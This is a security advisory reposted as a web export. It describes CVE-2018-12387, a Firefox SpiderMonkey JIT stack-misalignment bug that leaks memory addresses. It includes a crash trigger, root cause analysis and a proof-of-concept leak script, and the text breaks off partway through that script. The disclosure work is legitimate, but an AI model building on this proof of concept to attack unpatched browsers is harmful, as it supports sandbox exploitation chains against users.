{"id":13544,"date":"2018-10-09T14:19:05","date_gmt":"2018-10-09T22:19:05","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2018\/10\/09\/news-7311\/"},"modified":"2018-10-09T14:19:05","modified_gmt":"2018-10-09T22:19:05","slug":"news-7311","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/10\/09\/news-7311\/","title":{"rendered":"SSD Advisory \u2013 Firefox Information Leak"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Tue, 09 Oct 2018 08:55:15 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> A vulnerability where the JavaScript JIT compiler inlines Array.prototype.push with multiple arguments that results in the stack pointer being off by 8 bytes after a bailout. This leaks a memory address to the calling function which can be used as part of an exploit inside the sandboxed content process.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> &#8220;Security vulnerabilities fixed in Firefox 62.0.3 and Firefox ESR 60.2.2&#8221;<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-12387<\/p>\n<p><strong>Credit<\/strong><br \/> Independent security researchers, Bruno Keith and Niklas Baumstark, have reported this vulnerability to Beyond Security&#8217;s SecuriTeam Secure Disclosure program.<br \/> <span id=\"more-3766\"><\/span><br \/> <strong>Affected systems<\/strong><br \/> Firefox 62.0<br \/> Firefox ESR 60.2<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> While fuzzing Spidermonkey (Mozilla&#8217;s JavaScript engine written in C++), we trigger a debug assertion with the following minimized sample:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bbd2958b1227653244296\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">JavaScript<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> function f(o) {  \tvar a = [o];  \ta.length = a[0];  \tvar useless = function () {}  \tvar sz = Array.prototype.push.call(a, 42, 43);  \t(function () {  \t\tsz;  \t})(new Boolean(false));  }  for (var i = 0; i &lt; 25000; i++) {  \tf(1);  }  f(2);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0035 seconds] -->  <\/p>\n<p>which triggered the following assertion:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bbd2958b1232025548673\" class=\"crayon-syntax crayon-theme-terminal crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Assertion failure: isObject() and crashes in release  build<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1232025548673-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1232025548673-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1232025548673-1\"><span class=\"crayon-e\">Assertion <\/span><span class=\"crayon-v\">failure<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">isObject<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">crashes <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">release<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1232025548673-2\"><span class=\"crayon-v\">build<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p><strong>Root Cause Analysis<\/strong><br \/> The assertion described above happens while running the code generated by the JIT compiler for the function f.<\/p>\n<p>Let\u2019s look at the\u00a0Intermediate representation (IR)\u00a0of the JIT code:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/just-in-time-inermediate-representation-infloleak.png\" data-slb-active=\"1\" data-slb-asset=\"896111106\" data-slb-internal=\"0\" data-slb-group=\"3766\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3767\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/just-in-time-inermediate-representation-infloleak-182x300.png\" alt=\"\" width=\"582\" height=\"959\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/just-in-time-inermediate-representation-infloleak-182x300.png 182w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/just-in-time-inermediate-representation-infloleak.png 431w\" sizes=\"auto, (max-width: 582px) 100vw, 582px\" \/><\/a><\/p>\n<p>We can see two instructions arraypusht. This can be explained looking at the code responsible for inlining calls to Array.prototype.push implemented at <a href=\"https:\/\/dxr.mozilla.org\/mozilla-central\/source\/js\/src\/jit\/MCallOptimize.cpp#812\">https:\/\/dxr.mozilla.org\/mozilla-central\/source\/js\/src\/jit\/MCallOptimize.cpp#812<\/a> The comments inside the function mention that a call to push with multiple argument will be broken down into multiple individual arraypush{t,v} instructions. However there is some complicated logic associated with bailouts where they wish to preserve the atomicity of the call and not resume execution in-between inlined calls to push. The assertion is triggered because the stack pointer is not correctly restored when bailing out from IonMonkey to the baseline JIT and will be off by 8 bytes and hence lead to a JS_IS_CONSTRUCTING value to be fetched from the stack instead of the Boolean class.<\/p>\n<p>By understanding the failure condition, we know that we need to look for opcode handlers in BaselineCompiler.cpp that perform a syncStack(0) and then address stack values via peek(). An interesting one is BaselineCompiler::emit_JSOP_INITPROP:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bbd2958b1239302397045\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">JavaScript<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/\/ Load lhs in R0, rhs in R1.   frame.syncStack(0);   masm.loadValue(frame.addressOfStackValue(frame.peek(-2)), R0);   masm.loadValue(frame.addressOfStackValue(frame.peek(-1)), R1);   \/\/ Call IC.   ICSetProp_Fallback::Compiler compiler(cx);   if (!emitOpIC(compiler.getStub(&amp;stubSpace_)))       return false;   \/\/ Leave the object on the stack.   frame.pop();<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1239302397045-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1239302397045-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1239302397045-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1239302397045-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1239302397045-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1239302397045-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1239302397045-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1239302397045-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1239302397045-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1239302397045-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1239302397045-1\"><span class=\"crayon-c\">\/\/ Load lhs in R0, rhs in R1.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1239302397045-2\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">syncStack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1239302397045-3\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">masm<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">loadValue<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">addressOfStackValue<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">peek<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1239302397045-4\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">masm<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">loadValue<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">addressOfStackValue<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">peek<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1239302397045-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ Call IC.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1239302397045-6\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ICSetProp_Fallback<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">Compiler <\/span><span class=\"crayon-e\">compiler<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cx<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1239302397045-7\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">emitOpIC<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">compiler<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getStub<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">stubSpace_<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1239302397045-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1239302397045-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ Leave the object on the stack.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1239302397045-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pop<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0025 seconds] -->  <\/p>\n<p>This opcode is emitted for the following JavaScript code:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bbd2958b123d687126830\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> function f() {  \tvar y = {};  \tvar o = {  \t\ta: y  \t};  }  dis(f);   \/* bytecode:   00000: newobject ({}) # OBJ   00005: setlocal 0 # OBJ   00009: pop #   00010: newobject ({a:(void 0)}) # OBJ   00015: getlocal 0 # OBJ y   00019: initprop &#8220;a&#8221; # OBJ   00024: setlocal 1 # OBJ   00028: pop #   00029: retrval #   *\/<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b123d687126830-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b123d687126830-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b123d687126830-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b123d687126830-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b123d687126830-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b123d687126830-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b123d687126830-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b123d687126830-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b123d687126830-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b123d687126830-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b123d687126830-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b123d687126830-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b123d687126830-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b123d687126830-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b123d687126830-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b123d687126830-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b123d687126830-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b123d687126830-18\">18<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b123d687126830-1\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">f<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b123d687126830-2\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">y<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b123d687126830-3\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b123d687126830-4\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">y<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b123d687126830-5\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b123d687126830-6\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b123d687126830-7\"><span class=\"crayon-e\">dis<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b123d687126830-8\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* bytecode:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b123d687126830-9\"><span class=\"crayon-c\"> 00000: newobject ({}) # OBJ<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b123d687126830-10\"><span class=\"crayon-c\"> 00005: setlocal 0 # OBJ<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b123d687126830-11\"><span class=\"crayon-c\"> 00009: pop #<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b123d687126830-12\"><span class=\"crayon-c\"> 00010: newobject ({a:(void 0)}) # OBJ<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b123d687126830-13\"><span class=\"crayon-c\"> 00015: getlocal 0 # OBJ y<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b123d687126830-14\"><span class=\"crayon-c\"> 00019: initprop &#8220;a&#8221; # OBJ<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b123d687126830-15\"><span class=\"crayon-c\"> 00024: setlocal 1 # OBJ<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b123d687126830-16\"><span class=\"crayon-c\"> 00028: pop #<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b123d687126830-17\"><span class=\"crayon-c\"> 00029: retrval #<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b123d687126830-18\"><span class=\"crayon-c\"> *\/<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0012 seconds] -->  <\/p>\n<p>The handler tells us how this opcode gets compiled: R0 is set to stack[top-1] = o, R1 is set to stack[top] = y, then the property assignment R0.a = R1 is performed by an inline cache. Due to the shifted stack however, in the following code, the assignment stack[top].a = stack[top+1] is performed, so a JSValue is fetched from outside the stack. Due to NaN-boxing, a native pointer value will be treated as a double in this context.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bbd2958b1242943729547\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">JavaScript<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> var test = {  \ta: 13.37  };    function f(o) {  \tvar a = [o];  \ta.length = a[0];  \tvar useless = function () {}  \tuseless + useless;  \tvar sz = Array.prototype.push.call(a, 1337, 43);  \t(function () {  \t\tsz  \t})();  \tvar o = {  \t\ta: test  \t};  }  dis(f);  for (var i = 0; i &lt; 25000; i++) {  \tf(1);  }  f(100);  print(test.a);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1242943729547-2\">2<\/div>\n<div class=\"crayon-num\" 